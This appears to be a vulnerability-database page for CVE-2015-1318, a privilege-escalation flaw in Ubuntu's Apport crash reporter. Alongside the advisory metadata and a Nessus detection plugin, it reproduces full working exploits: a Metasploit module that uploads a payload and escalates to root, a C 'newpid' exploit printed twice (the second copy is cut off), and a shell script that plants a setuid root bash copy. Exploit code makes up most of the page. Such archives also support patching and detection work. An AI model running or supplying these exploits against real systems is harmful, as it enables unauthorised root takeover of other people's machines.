DATABASE RESOURCES PRICING ABOUT US

{"id": "UB:CVE-2015-1318", "vendorId": null, "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2015-1318", "description": "The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1\nallows local users to gain privileges via a crafted usr/share/apport/apport\nfile in a namespace (container).\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758>\n", "published": "2015-04-14T00:00:00", "modified": "2015-04-14T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2015-1318", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1318", "https://ubuntu.com/security/notices/USN-2569-1", "https://nvd.nist.gov/vuln/detail/CVE-2015-1318", "https://launchpad.net/bugs/cve/CVE-2015-1318", "https://security-tracker.debian.org/tracker/CVE-2015-1318"], "cvelist": ["CVE-2015-1318"], "immutableFields": [], "lastseen": "2022-08-04T14:17:00", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1318"]}, {"type": "exploitdb", "idList": ["EDB-ID:36746", "EDB-ID:36782", "EDB-ID:43971"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0EE3CCC19BA93F89F621C2116CB5B5DE", "EXPLOITPACK:CF772575B19CFD9EB560BCCD1B58D729"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-APPORT_ABRT_CHROOT_PRIV_ESC-"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2569-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842169"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131423", "PACKETSTORM:131429", "PACKETSTORM:146235"]}, {"type": "ubuntu", "idList": ["USN-2569-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-23511", "1337DAY-ID-29699"]}]}, "score": {"value": 4.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-1318"]}, {"type": "exploitdb", "idList": ["EDB-ID:43971"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0EE3CCC19BA93F89F621C2116CB5B5DE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131423"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-1318", "epss": "0.000630000", "percentile": "0.254530000", "modified": "2023-03-17"}], "vulnersScore": 4.1}, "_state": {"dependencies": 1659994789, "score": 1659995475, "epss": 1679077263}, "_internal": {"score_hash": "22de58e093adfb17f074329e2e7fca65"}, "affectedPackage": [{"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "2.14.1-0ubuntu3.9", "packageFilename": "UNKNOWN", "operator": "lt", "status": "released", "packageName": "apport"}, {"OS": "ubuntu", "OSVersion": "upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "apport"}, {"OS": "ubuntu", "OSVersion": "14.10", "arch": "noarch", "packageVersion": "2.14.7-0ubuntu8.3", "packageFilename": "UNKNOWN", "operator": "lt", "status": "released", "packageName": "apport"}], "bugs": ["https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758"]}

{"zdt": [{"lastseen": "2018-03-19T21:11:16", "description": "This Metasploit module attempts to gain root privileges on Linux systems by invoking the default coredump handler inside a namespace (\"container\"). Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing 'usr/share/apport/apport' within the crashed task's directory to be executed. Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing 'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be executed. In both instances, the crash handler does not drop privileges, resulting in code execution as root. This Metasploit module has been tested successfully on Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.", "cvss3": {}, "published": "2018-02-03T00:00:00", "type": "zdt", "title": "Apport / ABRT chroot Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1318"], "modified": "2018-02-03T00:00:00", "id": "1337DAY-ID-29699", "href": "https://0day.today/exploit/description/29699", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apport / ABRT chroot Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Linux systems by\r\n invoking the default coredump handler inside a namespace (\"container\").\r\n\r\n Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are\r\n vulnerable, due to a feature which allows forwarding reports to\r\n a container's Apport by changing the root directory before loading\r\n the crash report, causing 'usr/share/apport/apport' within the crashed\r\n task's directory to be executed.\r\n\r\n Similarly, Fedora is vulnerable when the kernel crash handler is\r\n configured to change root directory before executing ABRT, causing\r\n 'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be\r\n executed.\r\n\r\n In both instances, the crash handler does not drop privileges,\r\n resulting in code execution as root.\r\n\r\n This module has been tested successfully on Apport 2.14.1 on\r\n Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'StA(c)phane Graber', # Independent discovery, PoC and patch\r\n 'Tavis Ormandy', # Independent discovery and C exploit\r\n 'Ricardo F. Teixeira', # shell exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Mar 31 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-1318' ],\r\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],\r\n # Exploits\r\n [ 'EDB', '36782' ],\r\n [ 'EDB', '36746' ],\r\n [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],\r\n # ABRT (Fedora)\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],\r\n # Apport (Ubuntu)\r\n [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],\r\n [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],\r\n [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],\r\n [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir']\r\n end\r\n\r\n def check\r\n kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first\r\n\r\n if kernel_version < Gem::Version.new('3.12')\r\n vprint_error \"Linux kernel version #{kernel_version} is NOT vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n\r\n vprint_good \"Linux kernel version #{kernel_version} is vulnerable\"\r\n\r\n kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern'\r\n\r\n # Vulnerable core_pattern (abrt):\r\n # kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e\r\n # Patched systems no longer preface the command with /usr/sbin/chroot\r\n # kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e\r\n if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')\r\n vprint_good 'System is configured to chroot ABRT for crash reporting'\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n # Vulnerable core_pattern (apport):\r\n # kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P\r\n if kernel_core_pattern.include? 'apport'\r\n vprint_good 'System is configured to use Apport for crash reporting'\r\n\r\n res = cmd_exec 'apport-cli --version'\r\n\r\n if res.blank?\r\n vprint_error 'Apport is NOT installed'\r\n return CheckCode::Safe\r\n end\r\n\r\n apport_version = Gem::Version.new(res.split('-').first)\r\n\r\n if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')\r\n vprint_good \"Apport version #{apport_version} is vulnerable\"\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n vprint_error \"Apport version #{apport_version} is NOT vulnerable\"\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting'\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n register_file_for_cleanup path\r\n end\r\n\r\n def exploit\r\n if check != CheckCode::Vulnerable\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n # Upload Tavis Ormandy's newpid exploit:\r\n # - https://www.exploit-db.com/exploits/36746/\r\n # Cross-compiled with:\r\n # - i486-linux-musl-cc -static newpid.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_chmodx executable_path, executable_data\r\n\r\n # Upload payload executable\r\n payload_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n payload_path = \"#{base_dir}/#{payload_name}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # newpid writes an 'exploit' directory\r\n # which must be removed manually if exploitation fails\r\n register_dir_for_cleanup \"#{base_dir}/exploit\"\r\n\r\n # Change working directory to base_dir,\r\n # allowing newpid to create the required hard links\r\n cmd_exec \"cd '#{base_dir}'\"\r\n\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n # Check for root privileges\r\n id = cmd_exec 'id'\r\n\r\n unless id.include? 'root'\r\n fail_with Failure::Unknown, 'Failed to gain root privileges'\r\n end\r\n\r\n print_good 'Upgraded session to root privileges'\r\n vprint_line id\r\n\r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec payload_path\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/29699", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T10:24:09", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdt", "title": "Apport/Abrt Local Root Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1318"], "modified": "2015-04-15T00:00:00", "id": "1337DAY-ID-23511", "href": "https://0day.today/exploit/description/23511", "sourceData": "#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <elf.h>\r\n#include <err.h>\r\n#include <syslog.h>\r\n#include <sched.h>\r\n#include <linux/sched.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/auxv.h>\r\n#include <sys/wait.h>\r\n \r\n# warning this file must be compiled with -static\r\n \r\n//\r\n// Apport/Abrt Vulnerability Demo Exploit.\r\n//\r\n// Apport: CVE-2015-1318\r\n// Abrt: CVE-2015-1862\r\n//\r\n// -- [email\u00a0protected], April 2015.\r\n//\r\n// $ gcc -static newpid.c\r\n// $ ./a.out\r\n// uid=0(root) gid=0(root) groups=0(root)\r\n// sh-4.3# exit\r\n// exit\r\n//\r\n// Hint: To get libc.a,\r\n// yum install glibc-static or apt-get install libc6-dev\r\n//\r\n \r\nint main(int argc, char **argv)\r\n{\r\n int status;\r\n Elf32_Phdr *hdr;\r\n pid_t wrapper;\r\n pid_t init;\r\n pid_t subprocess;\r\n unsigned i;\r\n \r\n // Verify this is a static executable by checking the program headers for a\r\n // dynamic segment. Originally I thought just checking AT_BASE would work,\r\n // but that isnt reliable across many kernels.\r\n hdr = (void *) getauxval(AT_PHDR);\r\n \r\n // If we find any PT_DYNAMIC, then this is probably not a static binary.\r\n for (i = 0; i < getauxval(AT_PHNUM); i++) {\r\n if (hdr[i].p_type == PT_DYNAMIC) {\r\n errx(EXIT_FAILURE, \"you *must* compile with -static\");\r\n }\r\n }\r\n \r\n // If execution reached here, it looks like we're a static executable. If\r\n // I'm root, then we've convinced the core handler to run us, so create a\r\n // setuid root executable that can be used outside the chroot.\r\n if (getuid() == 0) {\r\n if (chown(\"sh\", 0, 0) != 0)\r\n exit(EXIT_FAILURE);\r\n \r\n if (chmod(\"sh\", 04755) != 0)\r\n exit(EXIT_FAILURE);\r\n \r\n return EXIT_SUCCESS;\r\n }\r\n \r\n // If I'm not root, but euid is 0, then the exploit worked and we can spawn\r\n // a shell and cleanup.\r\n if (setuid(0) == 0) {\r\n system(\"id\");\r\n system(\"rm -rf exploit\");\r\n execlp(\"sh\", \"sh\", NULL);\r\n \r\n // Something went wrong.\r\n err(EXIT_FAILURE, \"failed to spawn root shell, but exploit worked\");\r\n }\r\n \r\n // It looks like the exploit hasn't run yet, so create a chroot.\r\n if (mkdir(\"exploit\", 0755) != 0\r\n || mkdir(\"exploit/usr\", 0755) != 0\r\n || mkdir(\"exploit/usr/share\", 0755) != 0\r\n || mkdir(\"exploit/usr/share/apport\", 0755) != 0\r\n || mkdir(\"exploit/usr/libexec\", 0755) != 0) {\r\n err(EXIT_FAILURE, \"failed to create chroot directory\");\r\n }\r\n \r\n // Create links to the exploit locations we need.\r\n if (link(*argv, \"exploit/sh\") != 0\r\n || link(*argv, \"exploit/usr/share/apport/apport\") != 0 // Ubuntu\r\n || link(*argv, \"exploit/usr/libexec/abrt-hook-ccpp\") != 0) { // Fedora\r\n err(EXIT_FAILURE, \"failed to create required hard links\");\r\n }\r\n \r\n // Create a subprocess so we don't enter the new namespace.\r\n if ((wrapper = fork()) == 0) {\r\n \r\n // In the child process, create a new pid and user ns. The pid\r\n // namespace is only needed on Ubuntu, because they check for %P != %p\r\n // in their core handler. On Fedora, just a user ns is sufficient.\r\n if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)\r\n err(EXIT_FAILURE, \"failed to create new namespace\");\r\n \r\n // Create a process in the new namespace.\r\n if ((init = fork()) == 0) {\r\n \r\n // Init (pid 1) signal handling is special, so make a subprocess to\r\n // handle the traps.\r\n if ((subprocess = fork()) == 0) {\r\n // Change /proc/self/root, which we can do as we're privileged\r\n // within the new namepace.\r\n if (chroot(\"exploit\") != 0) {\r\n err(EXIT_FAILURE, \"chroot didnt work\");\r\n }\r\n \r\n // Now trap to get the core handler invoked.\r\n __builtin_trap();\r\n \r\n // Shouldn't happen, unless user is ptracing us or something.\r\n err(EXIT_FAILURE, \"coredump failed, were you ptracing?\");\r\n }\r\n \r\n // If the subprocess exited with an abnormal signal, then everything worked.\r\n if (waitpid(subprocess, &status, 0) == subprocess) \r\n return WIFSIGNALED(status)\r\n ? EXIT_SUCCESS\r\n : EXIT_FAILURE;\r\n \r\n // Something didn't work.\r\n return EXIT_FAILURE;\r\n }\r\n \r\n // The new namespace didn't work.\r\n if (waitpid(init, &status, 0) == init)\r\n return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS\r\n ? EXIT_SUCCESS\r\n : EXIT_FAILURE;\r\n \r\n // Waitpid failure.\r\n return EXIT_FAILURE;\r\n }\r\n \r\n // If the subprocess returned sccess, the exploit probably worked, reload\r\n // with euid zero.\r\n if (waitpid(wrapper, &status, 0) == wrapper) {\r\n // All done, spawn root shell.\r\n if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {\r\n execl(*argv, \"w00t\", NULL);\r\n }\r\n }\r\n \r\n // Unknown error.\r\n errx(EXIT_FAILURE, \"unexpected result, cannot continue\");\r\n}\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/23511", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2023-01-26T13:28:23", "description": "## Releases\n\n * Ubuntu 14.10 \n * Ubuntu 14.04 ESM\n\n## Packages\n\n * apport \\- automatically generate crash reports for debugging\n\nSt\u00e9phane Graber and Tavis Ormandy independently discovered that Apport \nincorrectly handled the crash reporting feature. A local attacker could use \nthis issue to gain elevated privileges.\n", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "ubuntu", "title": "Apport vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1318"], "modified": "2015-04-14T00:00:00", "id": "USN-2569-1", "href": "https://ubuntu.com/security/notices/USN-2569-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:54:20", "description": "Stephane Graber and Tavis Ormandy independently discovered that Apport incorrectly handled the crash reporting feature. A local attacker could use this issue to gain elevated privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 14.10 : apport vulnerability (USN-2569-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1318"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apport", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2569-1.NASL", "href": "https://www.tenable.com/plugins/nessus/82792", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2569-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82792);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1318\");\n script_xref(name:\"USN\", value:\"2569-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 14.10 : apport vulnerability (USN-2569-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stephane Graber and Tavis Ormandy independently discovered that\nApport incorrectly handled the crash reporting feature. A local\nattacker could use this issue to gain elevated privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2569-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apport package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apport / ABRT chroot Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apport\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"apport\", pkgver:\"2.14.1-0ubuntu3.9\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"apport\", pkgver:\"2.14.7-0ubuntu8.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apport\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:04", "description": "\nApport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation", "cvss3": {}, "published": "2015-04-17T00:00:00", "type": "exploitpack", "title": "Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1318"], "modified": "2015-04-17T00:00:00", "id": "EXPLOITPACK:0EE3CCC19BA93F89F621C2116CB5B5DE", "href": "", "sourceData": "#!/bin/sh\n#\n# CVE-2015-1318\n# \n# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758\n# \n# Example:\n#\n# % uname -a\n# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\n#\n# % lsb_release -a\n# No LSB modules are available.\n# Distributor ID: Ubuntu\n# Description: Ubuntu 14.04.2 LTS\n# Release: 14.04\n# Codename: trusty\n#\n# % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 \" \" $3 }'\n# apport 2.14.1-0ubuntu3.8\n#\n# % id\n# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)\n#\n# % ./apport.sh\n# pwned-4.3# id\n# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)\n# pwned-4.3# exit\n\nTEMPDIR=$(mktemp -d)\n\ncd ${TEMPDIR}\n\ncp /bin/busybox .\n\nmkdir -p dev mnt usr/share/apport\n\n(\ncat << EOF\n#!/busybox sh\n(\ncp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned\nchmod 5755 /mnt/1/root/tmp/pwned\n) \nEOF\n\n) > usr/share/apport/apport\n\nchmod +x usr/share/apport/apport\n\n(\ncat << EOF\nmount -o bind . .\ncd .\nmount --rbind /proc mnt\ntouch dev/null\npivot_root . .\n./busybox sleep 500 &\nSLEEP=\\$!\n./busybox sleep 1\n./busybox kill -11 \\$SLEEP\n./busybox sleep 5\nEOF\n) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \\\n lxc-unshare -s \"MOUNT|PID|NETWORK|UTSNAME|IPC\" -- /bin/sh 2>&1 >/dev/null\n\n/tmp/pwned -p\n\nrm -Rf ${TEMPDIR}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:04", "description": "\nApportAbrt (Ubuntu Fedora) - Local Privilege Escalation", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "exploitpack", "title": "ApportAbrt (Ubuntu Fedora) - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1318", "CVE-2015-1862"], "modified": "2015-04-14T00:00:00", "id": "EXPLOITPACK:CF772575B19CFD9EB560BCCD1B58D729", "href": "", "sourceData": "#define _GNU_SOURCE\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <elf.h>\n#include <err.h>\n#include <syslog.h>\n#include <sched.h>\n#include <linux/sched.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/auxv.h>\n#include <sys/wait.h>\n\n# warning this file must be compiled with -static\n\n//\n// Apport/Abrt Vulnerability Demo Exploit.\n//\n// Apport: CVE-2015-1318\n// Abrt: CVE-2015-1862\n// \n// -- taviso@cmpxchg8b.com, April 2015.\n//\n// $ gcc -static newpid.c\n// $ ./a.out\n// uid=0(root) gid=0(root) groups=0(root)\n// sh-4.3# exit\n// exit\n//\n// Hint: To get libc.a,\n// yum install glibc-static or apt-get install libc6-dev\n//\n\nint main(int argc, char **argv)\n{\n int status;\n Elf32_Phdr *hdr;\n pid_t wrapper;\n pid_t init;\n pid_t subprocess;\n unsigned i;\n\n // Verify this is a static executable by checking the program headers for a\n // 